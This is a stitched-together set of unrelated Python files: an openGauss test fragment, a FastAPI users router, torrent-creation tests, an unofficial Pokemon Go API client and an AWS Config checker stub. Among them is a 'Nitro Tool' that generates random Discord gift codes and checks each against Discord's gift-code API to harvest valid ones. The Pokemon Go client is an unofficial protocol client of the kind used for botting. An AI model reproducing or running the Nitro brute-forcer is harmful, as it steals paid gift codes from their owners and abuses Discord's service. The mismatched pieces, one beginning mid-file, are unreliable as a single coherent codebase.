                "'A9':[ Pre-read block size status ]","'A10':[ IO scheduler status ]","'A11':[ Network card configuration status ]",
                "'A12':[ Time consistency status ]","'A13':[ Firewall service status ]","'A14':[ THP service status ]",
                "'B1':[ Set system control parameters ]","'B2':[ Set file system configuration value ]","'B3':[ Set pre-read block size value ]",
                "'B4':[ Set IO scheduler value ]","'B5':[ Set network card configuration value ]","'B6':[ Set THP service ]",
                "'B7':[Set RemoveIPC value]","'B8':[Set Session Process]"]
            if len(options_list3) == len(parameter2):
                for opt in options_list3:
                    if opt in parameter2:
                        logger.info(f'{opt}---------参数校验通过---------')
                    else:
                        logger.error(f'{opt}---------参数校验不通过---------')
            else:
                logger.error('---------参数校验有误---------')
    def tearDown(self):
        """No environment cleanup is required for this read-only case."""
        logger.info('--------------无需清理环境-------------------')
        logger.info('------------------Opengauss_Function_Tools_gs_checkos_Case0001finish------------------')
"""
**User** record management implemented by factories
---------------------------------------------------
This module defines API routes for managing **User** records, and defines the :class:`JoinAssoc` data to describe the relationship between **User** records and other record types: **Domain**, **Email**, and **Quota**.
As such, this is the only router where the factories are used to create or update records with multiple associations. It seems a good opportunity for another example.
"""
from typing import List
from fastapi import status, APIRouter
from chapps.models import (
User,
Quota,
Domain,
Email,
UserResp,
UsersResp,
DomainsResp,
EmailsResp,
DeleteResp,
IntResp,
TextResp,
AssocOperation,
)
from chapps.rest.routers.common import (
get_item_by_id,
list_items,
create_item,
delete_item,
update_item,
adjust_associations,
list_associated,
)
import logging
import chapps.logging
logger = logging.getLogger(__name__)
# Router mounted at /users; the 404 schema applies to every route below.
api = APIRouter(
    prefix="/users",
    tags=["users"],
    responses={404: {"description": "User not found."}},
)
"""The API router for **User** record maintenance
This router is once again full of calls to the factories in the :mod:`~.common`
module. The **User** model is the most connected to other things, however, and
so seems like a good spot for examples related to associations.
.. _creating-users:
.. rubric:: Creating Users
When creating a **User** record, it seems likely that the caller might like to
automatically associate the new **User** with an existing **Quota** record, and
at least one **Domain** record, perhaps even an **Email** record. The factory
will provide a coroutine which will optionally accept ID lists for these
associations. That is to say, the coroutine will treat them as optional
arguments and do nothing if they are not provided.
All of the logic and magic behind making this go smoothly is hidden within the
:class:`.JoinAssoc` class. We simply provide a list of these associations to
the factory and it handles the rest:
.. code:: python
api.post(
"/",
status_code=201,
response_model=UserResp,
responses={status.HTTP_409_CONFLICT: {"description": "Unique key error."}},
)(create_item(User, response_model=UserResp, assoc=user_join_assoc))
In the above example, the `FastAPI`_ code for specifying details about the POST
route takes up more space than the factory call to obtain the actual **User**
creation coroutine.
The definition of :const:`.user_join_assoc` may be found below. It is a list
containing references to all three :class:`~.JoinAssoc` instances, relating to
a **Quota** and lists of **Domain** and **Email** records.
.. _handling-associations:
.. rubric:: Handling Associations
Sometimes there is a need to remove a specific association from a list, or add
one or a handful. It would be helpful if it were not necessary to obtain or
manufacture a list of IDs in order to use a replacement-type edit such as the
basic model update route. The **User** model has a number of different
associations to manage, so here is an example of adding domains:
.. code:: python
api.put("/{item_id}/domains/", response_model=TextResp)(
adjust_associations(
User, assoc=[user_domains_assoc], assoc_op=AssocOperation.add
)
)
I chose to use PUT because it is associated with partial updates. Within the
API router wrapper, we use a call to the :func:`~.adjust_associations` route
factory, which returns a coroutine which will take a **User** ID and a list of
**Domain** IDs as arguments. When invoked via the API, that coroutine will
ensure that all the existing **Domain** records listed are associated to the
**User**. :exc:`~sqlalchemy.exc.IntegrityError` is ignored during the process,
so any attempts to add an existing association or to add a nonexistent
**Domain** will not raise errors -- all existing **Domain** records identified
by ID will be associated to the **User**, and other associations to that
**User** will be preserved.
"""
# User<->Quota join: a single int quota id via the quota_user table.
user_quota_assoc = User.join_assoc(
    assoc_name="quota",
    assoc_type=int,
    assoc_model=Quota,
    assoc_id=Quota.id_name(),
    table=User.Meta.orm_model.metadata.tables["quota_user"],
)
# User<->Domain join: a list of domain ids via the domain_user table.
user_domains_assoc = User.join_assoc(
    assoc_name="domains",
    assoc_type=List[int],
    assoc_model=Domain,
    assoc_id=Domain.id_name(),
    table=User.Meta.orm_model.metadata.tables["domain_user"],
)
# User<->Email join: a list of email ids via the email_user table.
user_emails_assoc = User.join_assoc(
    assoc_name="emails",
    assoc_type=List[int],
    assoc_model=Email,
    assoc_id=Email.id_name(),
    table=User.Meta.orm_model.metadata.tables["email_user"],
)
# Passed to the create/get/update factories so all three joins are handled.
user_join_assoc = [user_quota_assoc, user_domains_assoc, user_emails_assoc]
# POST /users/: create a User, optionally wiring quota/domain/email joins.
api.post(
    "/",
    status_code=201,
    response_model=UserResp,
    responses={status.HTTP_409_CONFLICT: {"description": "Unique key error."}},
)(create_item(User, response_model=UserResp, assoc=user_join_assoc))
api.delete("/", response_model=DeleteResp)(delete_item(User))
api.get("/", response_model=UsersResp)(
    list_items(User, response_model=UsersResp)
)
api.get("/{item_id}", response_model=UserResp)(
    get_item_by_id(User, response_model=UserResp, assoc=user_join_assoc)
)
# Paginated listings of a user's associated domains and emails.
api.get("/{item_id}/domains/", response_model=DomainsResp)(
    list_associated(User, assoc=user_domains_assoc, response_model=DomainsResp)
)
api.get("/{item_id}/emails/", response_model=EmailsResp)(
    list_associated(User, assoc=user_emails_assoc, response_model=EmailsResp)
)
api.put("/", response_model=UserResp)(
    update_item(User, response_model=UserResp, assoc=user_join_assoc)
)
# PUT adds associations; DELETE removes them (partial, non-replacing edits).
api.put("/{item_id}/domains/", response_model=TextResp)(
    adjust_associations(
        User, assoc=[user_domains_assoc], assoc_op=AssocOperation.add
    )
)
api.put("/{item_id}/emails/", response_model=TextResp)(
    adjust_associations(
        User, assoc=[user_emails_assoc], assoc_op=AssocOperation.add
    )
)
# Fix: declare response_model=TextResp here as well — the parallel domains
# DELETE below does, and both wrap the same adjust_associations coroutine.
api.delete("/{item_id}/emails/", response_model=TextResp)(
    adjust_associations(
        User, assoc=[user_emails_assoc], assoc_op=AssocOperation.subtract
    )
)
api.delete("/{item_id}/domains/", response_model=TextResp)(
    adjust_associations(
        User, assoc=[user_domains_assoc], assoc_op=AssocOperation.subtract
    )
)
# note that the correct name of the quota parameter is necessary here
# NOTE(review): this route also omits response_model — probably TextResp
# too, but left unchanged pending confirmation.
api.put("/{item_id}/quota/{quota}")(
    adjust_associations(
        User, assoc=[user_quota_assoc], assoc_op=AssocOperation.replace
    )
)
# commenting out to get a clean release without these non-working routes
#
# we will provide these routes in a future release
# along with routes to count a user's domain authorizations
# and paginate the list of those authorizations
# @api.get("/count/", response_model=IntResp)
# async def count_all_users():
# return await count_users("%")
# @api.get("/count/{pattern}", response_model=IntResp)
# async def count_users(pattern: str):
# cur = pca.conn.cursor()
# sanitized_pattern = pattern
# query = f"SELECT COUNT( * ) FROM users WHERE name LIKE ?"
# logger.debug(
# f"Attempting to count users like {pattern} with query {query}"
# )
# cur.execute(query, (f"%{pattern}%",))
# results = cur.fetchone()[0]
# cur.close()
# return IntResp.send(results)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Test suite for zcomx/modules/torrents.py
"""
import os
import shutil
import unittest
from gluon import *
from applications.zcomx.modules.book_types import BookType
from applications.zcomx.modules.books import Book
from applications.zcomx.modules.creators import \
AuthUser, \
Creator
from applications.zcomx.modules.torrentparse import TorrentParser
from applications.zcomx.modules.torrents import \
AllTorrentCreator, \
BaseTorrentCreator, \
BookTorrentCreator, \
CreatorTorrentCreator, \
P2PNotifier, \
P2PNotifyError, \
TorrentCreateError
from applications.zcomx.modules.tests.runner import LocalTestCase
# C0111: Missing docstring
# R0904: Too many public methods
# pylint: disable=C0111,R0904
class SubBaseTorrentCreator(BaseTorrentCreator):
    """Concrete BaseTorrentCreator whose target/destination are injected."""
    # W0201: *Attribute %r defined outside __init__*
    # pylint: disable=W0201
    def get_destination(self):
        # Returns whatever set_destination() stored.
        return self._destination
    def get_target(self):
        # Returns whatever set_target() stored.
        return self._target
    def set_destination(self, dst):
        """Helper function to allow the destination to be provided."""
        self._destination = dst
    def set_target(self, target):
        """Helper function to allow the target to be provided."""
        self._target = target
class TorrentTestCase(LocalTestCase):
    """Base case creating throwaway .cbz fixture files under /tmp."""
    _tmp_dir = '/tmp/test_torrent'
    _test_file = None
    _test_path = None
    _test_creator_path = None
    _cbz_base_path = None
    # C0103: *Invalid name "%s" (should match %s)*
    # pylint: disable=C0103
    @classmethod
    def setUpClass(cls):
        # Build the fixture tree once per class; tearDownClass removes it.
        if not os.path.exists(cls._tmp_dir):
            os.makedirs(cls._tmp_dir)
        # Create some files to used for testing
        cls._test_file = os.path.join(cls._tmp_dir, 'file.cbz')
        if not os.path.exists(cls._test_file):
            with open(cls._test_file, 'w') as f:
                f.write('Testing')
        cls._test_path = os.path.join(cls._tmp_dir, 'subdir')
        if not os.path.exists(cls._test_path):
            os.makedirs(cls._test_path)
        for filename in ['a.cbz', 'b.cbz', 'c.cbz']:
            with open(os.path.join(cls._test_path, filename), 'w') as f:
                f.write('Testing')
        # Mirrors the cbz/zco.mx/<letter>/<CreatorName> production layout.
        cls._test_creator_path = os.path.join(
            cls._tmp_dir, 'cbz', 'zco.mx', 'F', 'FirstLast', 'subdir')
        if not os.path.exists(cls._test_creator_path):
            os.makedirs(cls._test_creator_path)
        for filename in ['a.cbz', 'b.cbz', 'c.cbz']:
            fullname = os.path.join(cls._test_creator_path, filename)
            with open(fullname, 'w') as f:
                f.write('Testing')
    @classmethod
    def tearDownClass(cls):
        # Remove the whole fixture tree.
        if os.path.exists(cls._tmp_dir):
            shutil.rmtree(cls._tmp_dir)
class TestBaseTorrentCreator(TorrentTestCase):
    """Tests archive/create plus the abstract accessors of BaseTorrentCreator."""
    def test____init__(self):
        tor_creator = BaseTorrentCreator()
        self.assertTrue(tor_creator)
    def test__archive(self):
        # archive() should place the torrent under <base>/tor/zco.mx/<dest>.
        tor_creator = SubBaseTorrentCreator()
        tor_creator.set_target(self._test_file)
        tor_creator.set_destination('F/FirstLast/file.torrent')
        tor_file = tor_creator.archive(base_path=self._tmp_dir)
        self.assertEqual(
            tor_file,
            '/tmp/test_torrent/tor/zco.mx/F/FirstLast/file.torrent'
        )
        self.assertTrue(os.path.exists(tor_file))
        # Verify the produced file is a real torrent with expected metadata.
        parser = TorrentParser(tor_file)
        self.assertEqual(
            parser.get_tracker_url(),
            b'http://bt.zco.mx:6969/announce'
        )
        self.assertEqual(
            parser.get_client_name(),
            b'mktorrent 1.1'
        )
        self.assertEqual(
            parser.get_files_details(),
            [(b'file.cbz', 7)]
        )
    def test__create(self):
        # W0212 (protected-access): *Access to a protected member
        # pylint: disable=W0212
        tor_creator = SubBaseTorrentCreator()
        # Test creating torrent for a file.
        tor_creator.set_target(self._test_file)
        tor_creator.create()
        tor_file = os.path.join(tor_creator.temp_directory(), 'file.torrent')
        self.assertEqual(
            tor_creator._tor_file,
            tor_file
        )
        self.assertTrue(os.path.exists(tor_file))
        # Check that it's a torrent file
        parser = TorrentParser(tor_file)
        self.assertEqual(
            parser.get_tracker_url(),
            b'http://bt.zco.mx:6969/announce'
        )
        self.assertEqual(
            parser.get_client_name(),
            b'mktorrent 1.1'
        )
        self.assertEqual(
            parser.get_files_details(),
            [(b'file.cbz', 7)]
        )
        # Test creating torrent for a directory.
        tor_creator = SubBaseTorrentCreator()
        tor_creator.set_target(self._test_path)
        tor_creator.create()
        tor_file = os.path.join(tor_creator.temp_directory(), 'file.torrent')
        self.assertEqual(
            tor_creator._tor_file,
            tor_file
        )
        self.assertTrue(os.path.exists(tor_file))
        # Check that it's a torrent file
        parser = TorrentParser(tor_file)
        self.assertEqual(
            parser.get_tracker_url(),
            b'http://bt.zco.mx:6969/announce'
        )
        self.assertEqual(
            parser.get_client_name(),
            b'mktorrent 1.1'
        )
        # NOTE(review): the directory case expects str filenames while the
        # single-file case expects bytes — confirm this asymmetry is intended.
        self.assertEqual(
            parser.get_files_details(),
            [('a.cbz', 7), ('b.cbz', 7), ('c.cbz', 7)]
        )
    def test__get_destination(self):
        # The base class accessors are abstract and must raise.
        tor_creator = BaseTorrentCreator()
        self.assertRaises(NotImplementedError, tor_creator.get_destination)
    def test__get_target(self):
        tor_creator = BaseTorrentCreator()
        self.assertRaises(NotImplementedError, tor_creator.get_target)
class TestAllTorrentCreator(TorrentTestCase):
    """Tests the site-wide ("all books") torrent creator's fixed paths."""
    def test____init__(self):
        tor_creator = AllTorrentCreator()
        self.assertTrue(tor_creator)
    def test__get_destination(self):
        # The all-books torrent has a fixed destination name.
        tor_creator = AllTorrentCreator()
        self.assertEqual(
            tor_creator.get_destination(),
            'zco.mx.torrent'
        )
    def test__get_target(self):
        # Target is the production cbz root.
        tor_creator = AllTorrentCreator()
        self.assertEqual(
            tor_creator.get_target(),
            'applications/zcomx/private/var/cbz/zco.mx'
        )
class TestBookTorrentCreator(TorrentTestCase):
    """Tests torrent creation for a single book record."""
    def test____init__(self):
        book = self.add(Book, dict(
            name='Test Book Torrent Creator'
        ))
        tor_creator = BookTorrentCreator(book)
        self.assertTrue(tor_creator)
    def test__archive(self):
        auth_user = self.add(AuthUser, dict(name='First Last'))
        creator = self.add(Creator, dict(auth_user_id=auth_user.id))
        book = self.add(Book, dict(
            name='My Book',
            publication_year=1999,
            creator_id=creator.id,
            book_type_id=BookType.by_name('one-shot').id,
        ))
        tor_creator = BookTorrentCreator(book)
        # book.cbz is not defined, should fail
        self.assertRaises(TorrentCreateError, tor_creator.archive)
        book = Book.from_updated(book, dict(cbz=self._test_file))
        tor_creator = BookTorrentCreator(book)
        tor_file = tor_creator.archive(base_path=self._tmp_dir)
        self.assertEqual(
            tor_file,
            os.path.join(
                '/tmp/test_torrent/tor/zco.mx',
                'F/FirstLast/My Book (1999) ({i}.zco.mx).cbz.torrent'.format(
                    i=creator.id)
            )
        )
        # archive() should also persist the torrent path on the book record.
        got = Book.from_id(book.id)
        self.assertEqual(got.torrent, tor_file)
    def test__get_destination(self):
        auth_user = self.add(AuthUser, dict(name='First Last'))
        creator = self.add(Creator, dict(auth_user_id=auth_user.id))
        book = self.add(Book, dict(
            name='My Book',
            publication_year=1999,
            creator_id=creator.id,
            book_type_id=BookType.by_name('one-shot').id,
        ))
        tor_creator = BookTorrentCreator(book)
        # Destination encodes creator initial, name, year and creator id.
        self.assertEqual(
            tor_creator.get_destination(),
            'F/FirstLast/My Book (1999) ({i}.zco.mx).cbz.torrent'.format(
                i=creator.id)
        )
    def test__get_target(self):
        book = self.add(Book, dict(
            name='Test Book Torrent Creator',
            cbz='/path/to/file.cbz',
        ))
        tor_creator = BookTorrentCreator(book)
        # The target is simply the book's cbz path.
        self.assertEqual(
            tor_creator.get_target(),
            '/path/to/file.cbz'
        )
class TestCreatorTorrentCreator(TorrentTestCase):
    """Tests torrent creation for a creator's complete works."""
    def test____init__(self):
        creator = Creator(dict(
            email='test____init__@gmail.com'
        ))
        tor_creator = CreatorTorrentCreator(creator)
        self.assertTrue(tor_creator)
    def test__archive(self):
        auth_user = self.add(AuthUser, dict(name='First Last'))
        creator = self.add(Creator, dict(auth_user_id=auth_user.id))
        tor_creator = CreatorTorrentCreator(creator)
        # The target cbz directory won't exist
        self.assertRaises(LookupError, tor_creator.archive)
        # Point the creator at the fixture cbz tree and retry.
        tor_creator = CreatorTorrentCreator(creator)
        tor_creator.set_cbz_base_path(self._tmp_dir)
        tor_file = tor_creator.archive(base_path=self._tmp_dir)
        fmt = '/tmp/test_torrent/tor/zco.mx/F/FirstLast ({i}.zco.mx).torrent'
        self.assertEqual(tor_file, fmt.format(i=creator.id))
        # archive() should persist the torrent path on the creator record.
        updated_creator = Creator.from_id(creator.id)
        self.assertEqual(updated_creator.torrent, tor_file)
    def test__get_destination(self):
        auth_user = self.add(AuthUser, dict(name='First Last'))
        creator = self.add(Creator, dict(auth_user_id=auth_user.id))
        tor_creator = CreatorTorrentCreator(creator)
        self.assertEqual(
            tor_creator.get_destination(),
            'F/FirstLast ({cid}.zco.mx).torrent'.format(cid=creator.id)
        )
    def test__get_target(self):
        auth_user = self.add(AuthUser, dict(name='First Last'))
        creator = self.add(Creator, dict(auth_user_id=auth_user.id))
        tor_creator = CreatorTorrentCreator(creator)
        # Default target is the creator's directory in the production tree.
        self.assertEqual(
            tor_creator.get_target(),
            'applications/zcomx/private/var/cbz/zco.mx/F/FirstLast'
        )
    def test__set_cbz_base_path(self):
        # W0212 (protected-access): *Access to a protected member
        # pylint: disable=W0212
        auth_user = self.add(AuthUser, dict(name='First Last'))
        creator = self.add(Creator, dict(auth_user_id=auth_user.id))
        tor_creator = CreatorTorrentCreator(creator)
        self.assertEqual(tor_creator._cbz_base_path, None)
        tor_creator.set_cbz_base_path(self._tmp_dir)
        self.assertEqual(tor_creator._cbz_base_path, self._tmp_dir)
class TestP2PNotifier(TorrentTestCase):
    """Tests construction and (expected-to-fail) notification of P2PNotifier."""
    def test____init__(self):
        notifier = P2PNotifier('aaa.cbz')
        self.assertTrue(notifier)
    def test__notify(self):
        notifier = P2PNotifier(self._test_file)
        # This test should fail. The test server doesn't have the
        # required tools installed. If the exception is raised, it's
        # proof the script was run, which is all we need to test.
        self.assertRaises(
            P2PNotifyError,
            notifier.notify
        )
class TestTorrentCreateError(LocalTestCase):
    """Verifies TorrentCreateError passes its message to the base Exception."""
    def test_parent_init(self):
        msg = 'This is an error message.'
        try:
            raise TorrentCreateError(msg)
        except TorrentCreateError as err:
            self.assertEqual(str(err), msg)
        else:
            # Safety net: fail loudly if the raise above did not happen.
            self.fail('TorrentCreateError not raised')
def setUpModule():
    """Set up web2py environment."""
    # C0103: *Invalid name "%%s" (should match %%s)*
    # pylint: disable=C0103
    LocalTestCase.set_env(globals())
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
from time import *
from discord_webhook import DiscordWebhook
import json, subprocess, random, string, time, requests, colorama, ctypes, os
import requests
import rainbowtext
# ANSI escape codes keyed by the tag names used inside [[...]] markers.
colors = {
    'B': '\033[94m',
    'OKGREEN': '\033[92m',
    'WARNING': '\033[93m',
    'RED': '\033[1;31;40m',
    'reset': '\033[0m'
}
def colorText(text):
    """Replace every known [[TAG]] marker in *text* with its ANSI code."""
    for name, code in colors.items():
        text = text.replace('[[' + name + ']]', code)
    return text
def Main():
    """Show the banner and menu, then dispatch to Gen() or Checker()."""
    reset = '[[reset]]'
    banner1=('''
    [[B]]███▄ █ ██▓▄▄▄█████▓ ██▀███ ▒█████ ▄▄▄█████▓ ▒█████ ▒█████ ██▓
    ██ ▀█ █ ▓██▒▓ ██▒ ▓▒▓██ ▒ ██▒▒██▒ ██▒ ▓ ██▒ ▓▒▒██▒ ██▒▒██▒ ██▒▓██▒
    ▓██ ▀█ ██▒▒██▒▒ ▓██░ ▒░▓██ ░▄█ ▒▒██░ ██▒ ▒ ▓██░ ▒░▒██░ ██▒▒██░ ██▒▒██░
    ▓██▒ ▐▌██▒░██░░ ▓██▓ ░ ▒██▀▀█▄ ▒██ ██░ ░ ▓██▓ ░ ▒██ ██░▒██ ██░▒██░
    ▒██░ ▓██░░██░ ▒██▒ ░ ░██▓ ▒██▒░ ████▓▒░ ▒██▒ ░ ░ ████▓▒░░ ████▓▒░░██████▒
    ░ ▒░ ▒ ▒ ░▓ ▒ ░░ ░ ▒▓ ░▒▓░░ ▒░▒░▒░ ▒ ░░ ░ ▒░▒░▒░ ░ ▒░▒░▒░ ░ ▒░▓ ░
    ░ ░░ ░ ▒░ ▒ ░ ░ ░▒ ░ ▒░ ░ ▒ ▒░ ░ ░ ▒ ▒░ ░ ▒ ▒░ ░ ░ ▒ ░
    ░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░ ░ ░ ▒ ░ ░
    ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░
    [[reset]]''')
    banner2=('''
    ╔═════════════════════════════════════════════════════════╗
    ║ Nitro Tool by viic ║
    ║═════════════════════════════════════════════════════════║
    ║ [1] NITRO CODE GENERADOR ║
    ║ [2] NITRO CODE CHECKER ║
    ║ [E] EXIT ║
    ╚═════════════════════════════════════════════════════════╝
    ''')
    # banner1 uses the [[TAG]] colour markers; banner2 is rainbow-printed.
    print(colorText(banner1))
    print((rainbowtext.text(banner2)))
    print(colorText(reset))
    # NOTE(review): the menu offers [E] EXIT but no branch handles it —
    # any input other than '1'/'2' just falls through and returns.
    h = input('escoja la herramienta que desea utilizar> ')
    if h == '1':
        Gen()
    elif h == '2':
        Checker()
def Checker():
    """Validate each code in codes.txt against the Discord gift-code API.

    Codes answering HTTP 200 are appended to valid_codes.txt; a coloured
    summary is printed and control returns to the main menu.
    """
    checked = 0
    valido = 0
    invalido = 0
    # Context managers guarantee both files are closed even if a request
    # raises (the original leaked the handles on any exception).
    with open("codes.txt", "r+", encoding='utf-8') as f, \
            open("valid_codes.txt", "a", encoding='utf-8') as v:
        for line in f:
            nitro = line.strip("\n")
            url = "https://discordapp.com/api/v9/entitlements/gift-codes/" + nitro + "?with_application=false&with_subscription_plan=true"
            r = requests.get(url)
            # 200 means the gift code exists and is redeemable.
            if r.status_code == 200:
                print(colorText('[[OKGREEN]][VALIDO][[reset]]'+str(nitro)))
                v.write(f"{nitro}\n")
                checked += 1
                valido += 1
            else:
                print(colorText(f'[[RED]][INVALIDO][[reset]]{nitro}'))
                checked += 1
                invalido += 1
    # BUG FIX: the summary previously bypassed colorText(), printing the
    # raw "[[OKGREEN]]"/"[[RED]]" tags instead of colours.
    print(colorText(f"\nSe checkearon códigos nitro,[[OKGREEN]]{valido} Validos[[reset]] y [[RED]]{invalido} Invalidos[[reset]]\n"))
    input(f" Presione cualquier tecla para volver al Menu de Inicio")
    Main()
def Gen():
    """Ask how many 16-char random codes to create, append them to
    codes.txt (one per line) and echo each to the console."""
    num = int(input(f"¿Cuantos códigos desea generar? "))
    alphabet = string.ascii_uppercase + string.digits + string.ascii_lowercase
    start = time.time()
    # BUG FIX: the file was reopened and closed on every loop iteration;
    # open it once for the whole batch. Also removed the unused `path`
    # variable and the always-true `if input == input:` guard.
    with open("codes.txt", "a", encoding='utf-8') as f:
        for _ in range(num):
            nitro = ''.join(random.choice(alphabet) for _ in range(16))
            f.write(nitro + '\n')
            print(nitro)
    end = time.time()
    # Typo fix in the prompt: "Menó" -> "Menú".
    input(f"\n Presiona cualquier tecla para volver al Menú de Inicio.")
    print(end - start)
    Main()
# Script entry point: show the menu as soon as the script runs.
Main()
|
from logging import getLogger
from yarl import URL
from aiohttp import BasicAuth
try:
    from aiosocks import Socks4Auth, Socks5Auth
except ImportError:
    # aiosocks is optional: define stand-ins that raise a helpful error
    # only if a SOCKS proxy is actually configured.
    class Socks4Auth(Exception):
        def __init__(*args, **kwargs):
            raise ImportError(
                'You must install aiosocks to use a SOCKS proxy.')
    Socks5Auth = Socks4Auth
from . import __title__, __version__
from .rpc_api import RpcApi, RpcState
from .auth_ptc import AuthPtc
from .auth_google import AuthGoogle
from .hash_server import HashServer
from .exceptions import AuthTokenExpiredException, InvalidCredentialsException, NoPlayerPositionSetException, ServerApiEndpointRedirectException
from .pogoprotos.networking.requests.request_type_pb2 import RequestType
from .pogoprotos.networking.platform.platform_request_type_pb2 import PlatformRequestType
class PGoApi:
    """Asynchronous Pokemon Go RPC client.

    Holds authentication state, player position, proxy configuration and
    the current RPC endpoint. Individual RPC methods can be called
    directly on the instance (see ``__getattr__``) or batched through a
    :class:`PGoApiRequest` obtained from :meth:`create_request`.
    """
    log = getLogger(__name__)
    log.info('%s v%s', __title__, __version__)
    def __init__(self, lat=None, lon=None, alt=None, proxy=None, device_info=None):
        """Initialize client state.

        lat/lon/alt: initial player position; may stay None until
            set_position() is called.
        proxy: proxy URL string or None. NOTE: the assignment below goes
            through the ``proxy`` property setter, which also derives
            ``proxy_auth`` from any credentials embedded in the URL.
        device_info: opaque device description forwarded to the RPC layer.
        """
        self.auth_provider = None
        self.state = RpcState()
        self._api_endpoint = 'https://pgorelease.nianticlabs.com/plfe/rpc'
        self.latitude = lat
        self.longitude = lon
        self.altitude = alt
        self.proxy_auth = None
        self.proxy = proxy
        self.device_info = device_info
    async def set_authentication(self, provider='ptc', username=None, password=None, timeout=10, locale='en_US', refresh_token=None):
        """Create the auth provider and log in.

        provider: 'ptc' or 'google'; anything else raises
            InvalidCredentialsException.
        For Google with a refresh token the access token is returned
        immediately; otherwise a username/password login is performed.
        """
        if provider == 'ptc':
            self.auth_provider = AuthPtc(
                username,
                password,
                proxy=self._proxy,
                proxy_auth=self.proxy_auth,
                timeout=timeout)
        elif provider == 'google':
            self.auth_provider = AuthGoogle(
                proxy=self._proxy, refresh_token=refresh_token)
            if refresh_token:
                return await self.auth_provider.get_access_token()
        else:
            raise InvalidCredentialsException(
                "Invalid authentication provider - only ptc/google available.")
        await self.auth_provider.user_login(username, password)
    def set_position(self, lat, lon, alt=None):
        """Update the player position used by subsequent RPC calls."""
        self.log.debug('Set Position - Lat: %s Lon: %s Alt: %s', lat, lon, alt)
        self.latitude = lat
        self.longitude = lon
        self.altitude = alt
    def create_request(self):
        """Return a new request builder bound to this client."""
        return PGoApiRequest(self)
    @staticmethod
    def activate_hash_server(hash_token, conn_limit=300):
        """Configure the global HashServer session with *hash_token*."""
        HashServer.set_token(hash_token)
        HashServer.activate_session(conn_limit)
    @property
    def position(self):
        # (latitude, longitude, altitude) tuple; entries may be None.
        return self.latitude, self.longitude, self.altitude
    @property
    def api_endpoint(self):
        return self._api_endpoint
    @api_endpoint.setter
    def api_endpoint(self, api_url):
        # Accept either a full https URL or a bare host path returned by a
        # server redirect, which lacks the scheme and '/rpc' suffix.
        if api_url.startswith("https"):
            self._api_endpoint = URL(api_url)
        else:
            self._api_endpoint = URL('https://' + api_url + '/rpc')
    @property
    def proxy(self):
        return self._proxy
    @proxy.setter
    def proxy(self, proxy):
        """Parse the proxy URL and derive proxy_auth from embedded
        user:password credentials (http, socks4 or socks5 schemes)."""
        if proxy is None:
            self._proxy = proxy
        else:
            self._proxy = URL(proxy)
            if self._proxy.user:
                scheme = self._proxy.scheme
                if scheme == 'http':
                    self.proxy_auth = BasicAuth(
                        self._proxy.user, self._proxy.password)
                elif scheme == 'socks5':
                    self.proxy_auth = Socks5Auth(
                        self._proxy.user, self._proxy.password)
                elif scheme == 'socks4':
                    # SOCKS4 supports only a user id, no password.
                    self.proxy_auth = Socks4Auth(self._proxy.user)
                else:
                    raise ValueError(
                        'Proxy protocol must be http, socks5, or socks4.')
    @property
    def start_time(self):
        return self.state.start_time
    def __getattr__(self, func):
        """Allow RPC methods to be awaited directly on the client, e.g.
        ``await api.get_player()`` builds and fires a one-shot request.

        Only names matching a RequestType entry are accepted; anything
        else raises AttributeError as usual.
        """
        async def function(**kwargs):
            request = self.create_request()
            getattr(request, func)(**kwargs)
            return await request.call()
        if func.upper() in RequestType.keys():
            return function
        else:
            raise AttributeError('{} not known.'.format(func))
class PGoApiRequest:
    """Builder for a batched RPC call.

    RPC method names are added via attribute access (``req.get_player()``)
    and the whole batch is executed with :meth:`call`.
    """
    log = getLogger(__name__)
    def __init__(self, parent):
        # The owning PGoApi client; supplies auth, position and proxy.
        self.__parent__ = parent
        self._req_method_list = []
        self._req_platform_list = []
    async def call(self):
        """Execute the queued requests and return the server response.

        Retries transparently on an expired auth token (refreshing it)
        and on a server-issued endpoint redirect. Raises
        NoPlayerPositionSetException if lat/lon are not set.
        """
        parent = self.__parent__
        auth_provider = parent.auth_provider
        position = parent.position
        try:
            assert position[0] is not None and position[1] is not None
        except AssertionError:
            raise NoPlayerPositionSetException('No position set.')
        request = RpcApi(auth_provider, parent.state)
        while True:
            try:
                response = await request.request(parent.api_endpoint, self._req_method_list, self._req_platform_list, position, parent.device_info, parent._proxy, parent.proxy_auth)
                break
            except AuthTokenExpiredException:
                self.log.info('Access token rejected! Requesting new one...')
                await auth_provider.get_access_token(force_refresh=True)
            except ServerApiEndpointRedirectException as e:
                self.log.debug('API endpoint redirect... re-executing call')
                parent.api_endpoint = e.endpoint
        # cleanup after call execution
        self._req_method_list = []
        return response
    def list_curr_methods(self):
        """Print the queued request types (debug helper)."""
        for i in self._req_method_list:
            print("{} ({})".format(RequestType.Name(i), i))
    def __getattr__(self, func):
        """Queue an RPC or platform request by name.

        Returns a callable that appends the request (with optional kwargs)
        to the appropriate queue and returns ``self`` for chaining.
        Unknown names raise AttributeError when the callable is invoked.
        """
        func = func.upper()
        def function(**kwargs):
            self.log.debug('Creating a new request...')
            try:
                if func in RequestType.keys():
                    if kwargs:
                        self._req_method_list.append((RequestType.Value(func), kwargs))
                        self.log.debug("Arguments of '%s': \n\r%s", func, kwargs)
                    else:
                        self._req_method_list.append(RequestType.Value(func))
                        self.log.debug("Adding '%s' to RPC request", func)
                elif func in PlatformRequestType.keys():
                    if kwargs:
                        self._req_platform_list.append((PlatformRequestType.Value(func), kwargs))
                        self.log.debug("Arguments of '%s': \n\r%s", func, kwargs)
                    else:
                        self._req_platform_list.append(PlatformRequestType.Value(func))
                        self.log.debug("Adding '%s' to RPC request", func)
            except ValueError:
                raise AttributeError('{} not known.'.format(func))
            return self
        return function
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
# SPDX-License-Identifier: MIT-0
import json
import boto3
from botocore.config import Config
import time
class ConfigRecordersCheck(object):
    """Check AWS Config recorder status in every enabled region of a
    target account and publish the results as CloudWatch metrics.

    Cross-account access is obtained by assuming the AssumedFunctionRole
    role in the target account; all metrics are published to us-east-1
    under the 'AWSConfigStatus' namespace.
    """
    def __init__(self, accountid):
        # Target account to inspect.
        self.accountid = accountid
        # Retry configuration shared by every client created below.
        self.config = Config(
            signature_version='v4',
            retries={
                'max_attempts': 10,
                'mode': 'standard',
            }
        )
        self.sts_connection = boto3.client(
            'sts', config=self.config)
